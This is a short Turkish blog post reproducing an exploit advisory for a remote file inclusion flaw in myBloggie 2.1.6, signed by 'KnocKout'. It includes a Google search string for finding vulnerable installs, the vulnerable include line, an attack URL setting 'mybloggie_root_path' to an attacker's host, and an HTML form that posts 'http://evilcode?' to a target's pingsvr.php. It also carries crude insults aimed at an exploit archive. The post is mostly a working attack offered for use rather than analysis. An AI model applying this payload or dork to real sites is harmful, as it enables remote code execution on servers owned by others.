18 Aralık 2010 Cumartesi

myBloggie 2.1.6 - Remote file Inclusion Exploit

=======================================================
myBloggie 2.1.6 - Remote file Inclusion Exploit
=======================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
############################################################
fuck exploit(lamer)-DB.com Noobs..
Kralınız gelsin. mua:) siksqlZkırev..
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : myBloggie
|~Price : N/A
|~Version : 2.1.6
|~Software: http://mybloggie.mywebland.com
|~Vulnerability Style : Remote file Inclusion
|~Vulnerability Dir : /
|~sqL : MysqL 
|~Google Keyword : "Powered by myBloggie Copyright © 2004 2006"
|[~]Date : "19.12.2010"
|[~]Tested on : (L):Vista (R):http://localhost/
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Line in 7
<?php
..
include_once($mybloggie_root_path.'includes/IXR_Library.inc.php');
..
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| pingsvr.php File Inclusion~~~~~~~~~~~}|
    
    http://$localhost/$path/pingserver/pingsvr.php?mybloggie_root_path=$Evil?

    
    <html>
<body>
<form 
action="http://[TARGET]/pingserver/pingsvr.php?mybloggie_root_path" 
method="POST">
<input type="submit" name="mybloggie_root_path" value="http://evilcode?">
</form>
</body>
</html>



    To your continue..

    =============================================================

Hiç yorum yok:

Yorum Gönder